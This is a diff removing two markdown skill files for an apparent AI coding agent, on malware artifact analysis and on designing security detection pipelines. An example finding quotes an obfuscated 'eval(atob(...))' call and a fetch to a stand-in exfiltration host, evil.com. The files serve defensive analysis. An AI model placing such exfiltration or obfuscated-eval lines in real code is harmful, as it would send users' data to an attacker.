- ...
198
-
199
- ## IOCs Extracted
200
-
201
- - IPs/Domains: [list]
202
- - Hashes: [list]
203
- - Credentials: [list]
204
- - URLs: [list]
205
-
206
- ## Correlation
207
-
208
- - Git History: [recent commits, authors]
209
- - Related Artifacts: [files with similar patterns]
210
- - Incident Context: [if part of investigation]
211
-
212
- ## Conclusion
213
-
214
- [Overall assessment, confidence, next actions]
215
- ```
216
-
217
- ## Analysis Examples
218
-
219
- ### Example 1: JavaScript Malware Analysis
220
-
221
- ```yaml
222
- artifact:
223
- file: suspicious.js
224
- type: source_code
225
- size: 2.4KB
226
-
227
- analysis:
228
- static_findings:
229
- - type: obfuscation
230
- evidence: "eval(atob(base64_string))"
231
- severity: high
232
- - type: network_indicators
233
- evidence: "fetch('https://evil.com/exfil')"
234
- severity: critical
235
- iocs:
236
- - type: domain
237
- value: evil.com
238
- - type: technique
239
- value: command_and_control
240
- framework_mapping:
241
- MITRE: [T1059.003 JavaScript, T1071.001 C2]
242
- OWASP: [A7:2017 Security Misconfiguration]
243
- ```
244
-
245
- ### Example 2: Configuration Secret Detection
246
-
247
- ```yaml
248
- artifact:
249
- file: config.json
250
- type: config
251
- findings:
252
- - type: hardcoded_secret
253
- location: line 23
254
- evidence: '"api_key": "sk-live-abc123xyz"'
255
- severity: critical
256
- - type: insecure_transport
257
- location: line 45
258
- evidence: '"protocol": "http"'
259
- severity: high
260
- ```
261
-
262
- ## Anti-Patterns
263
-
264
- - **Don't** analyze without collecting metadata first (missing context)
265
- - **Don't** skip type identification (wrong analysis approach)
266
- - **Don't** skip validation of IOCs (false positives)
267
- - **Don't** skip framework mapping (missing MITRE/OWASP context)
268
- - **Don't** skip correlation with other artifacts (missing campaign context)
269
-
270
- ## Enforcement — Artifact Analysis Gate
271
-
272
- **Before reporting findings, verify:**
273
-
274
- - [ ] Artifact type identified and confirmed (source code / binary / config / log)
275
- - [ ] Analysis approach matches artifact type (static analysis, sandbox, syntax validation)
276
- - [ ] At least one finding with evidence and severity
277
- - [ ] IOCs validated (not just regex match)
278
- - [ ] Framework mapping included (MITRE ATT&CK, OWASP, or CWE)
279
- - [ ] Report includes confidence level and recommendations
280
-
281
- If ANY answer is NO → Stop. State what's missing. Do not report findings.
282
-
283
- ## Tools
284
-
285
- | Tool | Purpose |
286
- |------|---------|
287
- | `rg` (ripgrep) | Pattern search, IOC extraction |
288
- | `semgrep` | AST-based analysis |
289
- | `jq` | JSON/YAML parsing |
290
- | `strings` | Binary string extraction |
291
- | `file` | File type identification |
292
- | `xxd` | Hex dump analysis |
293
-
294
- ## Verification
295
-
296
- For artifact analysis changes:
297
- ```bash
298
- cd pi-crew
299
- npx tsc --noEmit
300
- node --experimental-strip-types --test test/unit/artifact-analysis.test.ts
301
- ```
302
-
303
- *See also: `event-log-tracing` for log analysis, `threat-hypothesis-framework` for investigation methodology.*
@@ -1,286 +0,0 @@
1
- ---
2
- name: detection-pipeline-design
3
- description: "Design data pipelines for security monitoring and threat intelligence."
4
- origin: distilled:anthropic-cybersecurity-skills
5
- triggers:
6
- - "build pipeline"
7
- - "design detection"
8
- - "setup monitoring"
9
- - "enrich data"
10
- - "threat intelligence"
11
- ---
12
- # detection-pipeline-design
13
-
14
- Use this skill when designing data pipelines for security detection and enrichment.
15
-
16
- ## Source
17
-
18
- Distilled from `building-ioc-enrichment-pipeline-with-opencti` (Anthropic Cybersecurity Skills) and generalized for software/build context.
19
-
20
- ## When to Use
21
-
22
- - Building detection and monitoring systems
23
- - Designing security data pipelines
24
- - Setting up automated threat intelligence
25
- - Creating alert enrichment workflows
26
- - Integrating security scanning into CI/CD
27
-
28
- ## Pipeline Architecture
29
-
30
- ```
31
- ┌─────────┐ ┌──────────┐ ┌──────────┐ ┌─────────┐ ┌─────────┐
32
- │ Input │ → │ Transform│ → │ Enrich │ → │ Score │ → │ Route │
33
- │ Data │ │ (Norm) │ │ (Context)│ │ (Conf) │ │(Action) │
34
- └─────────┘ └──────────┘ └──────────┘ └─────────┘ └─────────┘
35
-
36
- ┌──────────┐
37
- │ Output │
38
- │ Findings │
39
- └──────────┘
40
- ```
41
-
42
- ## Pipeline Components
43
-
44
- ### 1. Input Stage
45
-
46
- ```yaml
47
- input:
48
- types:
49
- - name: file_change
50
- sources: [git, filesystem]
51
- - name: log_event
52
- sources: [application, system]
53
- - name: alert
54
- sources: [scanner, monitor]
55
- - name: dependency
56
- sources: [npm, pip, cargo]
57
- format: [json, plain_text, structured]
58
- polling: [real_time, batch, scheduled]
59
- ```
60
-
61
- ### 2. Transform Stage
62
-
63
- ```yaml
64
- transform:
65
- operations:
66
- - name: normalize
67
- description: Convert to standard format
68
- output: stix_like_object
69
- - name: extract_indicators
70
- description: Pull out IOCs
71
- extract: [ips, domains, hashes, credentials, tokens]
72
- - name: enrich_metadata
73
- description: Add context
74
- add: [file_type, language, framework, timestamp]
75
- output_format: json
76
- ```
77
-
78
- ### 3. Enrich Stage
79
-
80
- ```yaml
81
- enrich:
82
- internal_sources:
83
- - name: vulnerability_db
84
- query: [cve_id, cwe]
85
- - name: code_analysis
86
- query: [pattern, structure]
87
- - name: git_history
88
- query: [author, commit, diff]
89
- external_sources:
90
- - name: npm_audit
91
- api: npmjs.org
92
- - name: osv
93
- api: osv.dev
94
- - name: gh_advisory
95
- api: github.com/advisories
96
- async: true
97
- timeout_ms: 5000
98
- ```
99
-
100
- ### 4. Score Stage
101
-
102
- ```yaml
103
- score:
104
- confidence_calculation:
105
- factors:
106
- - name: source_reliability
107
- weight: 0.3
108
- scale: [0-10]
109
- - name: contextual_evidence
110
- weight: 0.4
111
- scale: [0-10]
112
- - name: historical_matches
113
- weight: 0.3
114
- scale: [0-10]
115
- formula: >
116
- (reliability * 0.3) +
117
- (evidence * 0.4) +
118
- (historical * 0.3)
119
- thresholds:
120
- critical: [90-100]
121
- high: [70-89]
122
- medium: [40-69]
123
- low: [0-39]
124
- ```
125
-
126
- ### 5. Route Stage
127
-
128
- ```yaml
129
- route:
130
- paths:
131
- - condition: "score >= 90"
132
- action: [alert, block, notify]
133
- destination: [security_team, incident_response]
134
- - condition: "score >= 70"
135
- action: [alert, review]
136
- destination: [security_queue]
137
- - condition: "score >= 40"
138
- action: [log, monitor]
139
- destination: [security_logs]
140
- - condition: "score < 40"
141
- action: [ignore]
142
- destination: []
143
- ```
144
-
145
- ## Pipeline Design Patterns
146
-
147
- ### Pattern 1: Real-time File Monitoring
148
-
149
- ```yaml
150
- pipeline:
151
- name: file-change-detection
152
- trigger:
153
- type: filesystem_watch
154
- paths: ["src/**/*.ts", "src/**/*.js"]
155
- transform:
156
- - extract: [imports, function_calls, secrets]
157
- enrich:
158
- - check: npm_audit
159
- - check: known_vulnerable_patterns
160
- score:
161
- - base: vulnerability_severity
162
- - modifier: exploitability
163
- route:
164
- critical: slack_alert + block_merge
165
- high: github_issue + notify
166
- medium: log + track
167
- ```
168
-
169
- ### Pattern 2: Dependency Vulnerability Pipeline
170
-
171
- ```yaml
172
- pipeline:
173
- name: dependency-vuln-scan
174
- trigger:
175
- type: package_lock_change
176
- transform:
177
- - extract: [package_names, versions, sources]
178
- enrich:
179
- - query: osv_database
180
- - query: npm_advisories
181
- - query: github_advisories
182
- score:
183
- - base: cvss_score
184
- - modifier: [has_exploit, is_dependencies]
185
- route:
186
- critical: [create_security_issue, alert_team]
187
- high: [create_issue, schedule_fix]
188
- medium: [add_to_backlog]
189
- low: [note_in_changelog]
190
- ```
191
-
192
- ### Pattern 3: Secret Detection Pipeline
193
-
194
- ```yaml
195
- pipeline:
196
- name: secret-detection
197
- trigger:
198
- type: git_push
199
- transform:
200
- - extract: [api_keys, tokens, passwords, credentials]
201
- enrich:
202
- - validate: key_format
203
- - check: blacklists
204
- score:
205
- - base: key_validity
206
- - modifier: [key_age, exposure_scope]
207
- route:
208
- critical: [revoke_key, alert_security, block_push]
209
- high: [notify_owner, rotate_key]
210
- medium: [flag_for_review]
211
- low: [log]
212
- ```
213
-
214
- ## Implementation Example
215
-
216
- ```typescript
217
- interface DetectionPipeline {
218
- name: string;
219
- input: InputConfig;
220
- transform: TransformConfig;
221
- enrich: EnrichConfig;
222
- score: ScoreConfig;
223
- route: RouteConfig;
224
- }
225
-
226
- async function runPipeline(pipeline: DetectionPipeline, data: unknown): Promise<PipelineResult> {
227
- // 1. Input validation
228
- const normalized = normalizeInput(data, pipeline.input);
229
-
230
- // 2. Transform - extract indicators
231
- const indicators = extractIndicators(normalized, pipeline.transform);
232
-
233
- // 3. Enrich - query external/internal sources
234
- const enriched = await enrichIndicators(indicators, pipeline.enrich);
235
-
236
- // 4. Score - calculate confidence
237
- const scored = calculateScore(enriched, pipeline.score);
238
-
239
- // 5. Route - determine action
240
- const action = determineAction(scored, pipeline.route);
241
-
242
- return { indicators, enriched, scored, action };
243
- }
244
- ```
245
-
246
- ## Enforcement — Detection Pipeline Design Gate
247
-
248
- **Before deploying detection pipelines, verify:**
249
-
250
- - [ ] Input format validated before transform stage
251
- - [ ] Scoring thresholds tuned to environment (not hardcoded defaults)
252
- - [ ] Confidence calculation includes multiple factors (reliability, evidence, history)
253
- - [ ] Route actions match score thresholds (critical → block, low → ignore)
254
- - [ ] False positive rate measured and acceptable
255
- - [ ] External API calls are async (non-blocking)
256
-
257
- If ANY answer is NO → Stop. Tune the pipeline before deploying.
258
-
259
- ## Anti-Patterns
260
-
261
- - **Don't** skip input validation (garbage in, garbage out)
262
- - **Don't** skip enrichment (missing context leads to false positives)
263
- - **Don't** use fixed thresholds (tune based on environment)
264
- - **Don't** ignore false positive rates (kills analyst productivity)
265
- - **Don't** block on external APIs in synchronous path (use async)
266
-
267
- ## Tools & Integrations
268
-
269
- | Tool | Pipeline Role |
270
- |------|---------------|
271
- | `semgrep` | Static analysis, pattern matching |
272
- | `npm audit` | Dependency vulnerability |
273
- | `trufflehog` | Secret scanning |
274
- | `grype` | Container vulnerability |
275
- | `syft` | SBOM generation |
276
-
277
- ## Verification
278
-
279
- For pipeline design changes:
280
- ```bash
281
- cd pi-crew
282
- npx tsc --noEmit
283
- node --experimental-strip-types --test test/unit/detection-pipeline.test.ts
284
- ```
285
-
286
- *See also: `security-review` skill for detection rule patterns and signature authoring guidance.*